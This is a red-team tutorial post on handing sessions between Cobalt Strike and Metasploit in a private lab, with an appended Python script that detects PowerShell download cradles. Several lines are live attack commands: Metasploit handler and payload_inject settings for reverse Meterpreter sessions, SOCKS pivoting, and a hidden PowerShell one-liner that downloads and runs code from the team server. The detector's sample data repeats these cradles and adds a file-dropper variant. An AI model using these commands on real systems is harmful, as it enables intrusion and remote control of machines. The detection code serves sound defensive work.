Linking CS and MSF (Cobalt Strike and Metasploit)

Posted by Tattoo on 2021-03-29


NAT mode

CS : 192.168.120.67

MSF : 192.168.120.68

victim : 192.168.120.71

CS to MSF

  1. Use a CS beacon to spawn a shell to MSF
  • MSF

Configure as follows:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.120.68
lhost => 192.168.120.68
msf6 exploit(multi/handler) > set lport 5678
lport => 5678
msf6 exploit(multi/handler) > set ExitOnSession False
ExitOnSession => false
msf6 exploit(multi/handler) > exploit

[*] Started HTTP reverse handler on http://192.168.120.68:5678

  • CS

Create a Foreign HTTP(S) listener; its host and port must be the same as those configured in MSF.

Right-click the beacon and choose the listener you just created.

At this point MSF obtains a shell.

  2. Use CS to provide port forwarding or proxying for MSF

Right-click the beacon -> Pivoting -> SOCKS Server, and configure the port.

View -> Proxy Pivots lists the forwarder just created; click Tunnel to get the forwarding command for MSF.

Paste it into MSF; subsequent scanning and exploitation can then go through the pivot.

MSF to CS

  1. Use a Meterpreter session to spawn a beacon to CS
  • MSF

use exploit/windows/local/payload_inject

# payload must match the CS listener type
set payload windows/meterpreter/reverse_http

# CS team server IP
set lhost 192.168.120.67

# CS listener port
set lport 1234

# ID of the existing Meterpreter session
set session 1

# Tell MSF not to start its own handler (otherwise msf reports success, no session is established, and CS never receives one)
set disablepayloadhandler true

exploit

A new beacon checks in to CS; migrate it to another process promptly so the session is not lost if the original one disconnects.

  2. Get a command-execution shell
  • CS

Attacks -> Web Drive-by -> Scripted Web Delivery(S)

Configure the listener and URL path; after you launch it, a dialog shows the corresponding one-liner:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.120.67:80/login.php'))"

Copy the command into the Meterpreter session and run it.
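The one-liner above is the same PowerShell download cradle a defender can hunt for in process-creation telemetry (Sysmon Event ID 1, EDR command-line logs). The Python below is an added example, not part of the original post or of either framework: it matches the cradle's indicators case-insensitively over a few constructed command lines, also catching mixed-case and DownloadFile variants, and pulls out the staging URL as an indicator to block. The sample lines, the host 10.0.0.5 and the verdict labels are assumptions made for this example.

```python
import re
from typing import Dict, List, Optional

# Each indicator is matched case-insensitively against a process command line.
# Together they describe the one-liner that Scripted Web Delivery prints:
#   powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://...'))"
INDICATORS = {
    "powershell_host": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    # -nop / -NoProfile
    "no_profile": re.compile(r"(?:^|\s)-nop(?:rofile)?\b", re.I),
    # -w hidden / -win hidden / -WindowStyle Hidden (PowerShell accepts parameter prefixes)
    "hidden_window": re.compile(r"(?:^|\s)-w\w*\s+hidden\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|\binvoke-expression\b", re.I),
    "web_download": re.compile(
        r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I
    ),
}
# First http(s) URL on the command line, cut at whitespace, quotes or parentheses.
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def analyze(cmdline: str) -> Dict[str, object]:
    """Classify one command line as 'cradle', 'download' or 'benign'."""
    matched = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    url_match = URL_RE.search(cmdline)
    url: Optional[str] = url_match.group(0) if url_match else None
    if "powershell_host" not in matched:
        verdict = "benign"
    elif "invoke_expression" in matched and "web_download" in matched:
        # fetch-and-execute in memory: the download cradle itself
        verdict = "cradle"
    elif "web_download" in matched and url is not None:
        # fetches content from the network without an obvious in-memory execute
        verdict = "download"
    else:
        verdict = "benign"
    return {"cmdline": cmdline, "verdict": verdict, "indicators": matched, "url": url}


def scan(cmdlines: List[str]) -> List[Dict[str, object]]:
    """Return an alert record for every non-benign command line."""
    return [r for r in (analyze(c) for c in cmdlines) if r["verdict"] != "benign"]


# Constructed sample command lines (assumption: what a Sysmon/EDR CommandLine field would hold).
SAMPLE_COMMAND_LINES = [
    # the one-liner shown on this page
    "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.120.67:80/login.php'))\"",
    # mixed-case variant of the same cradle (constructed)
    "PoWeRsHeLl -NoP -W Hidden -C \"iex (New-Object Net.WebClient).DownloadString('http://192.168.120.67/update')\"",
    # drops a file to disk instead of executing in memory (constructed, host 10.0.0.5 is made up)
    "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://10.0.0.5/a.exe','C:\\Users\\Public\\a.exe')\"",
    # ordinary administration (constructed)
    "powershell.exe -NoProfile -Command \"Get-Date; Get-Process | Select-Object -First 3\"",
    r"cmd.exe /c dir C:\Users",
]


if __name__ == "__main__":
    for alert in scan(SAMPLE_COMMAND_LINES):
        print(f"[{alert['verdict']}] url={alert['url']} indicators={alert['indicators']}")
        print(f"    {alert['cmdline']}")
```

The `no_profile` and `hidden_window` indicators are reported as context rather than used in the verdict, because legitimate scheduled tasks use them too; the verdict hinges on the combination of a PowerShell host, a network fetch and in-memory execution, which is what makes the cradle itself.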
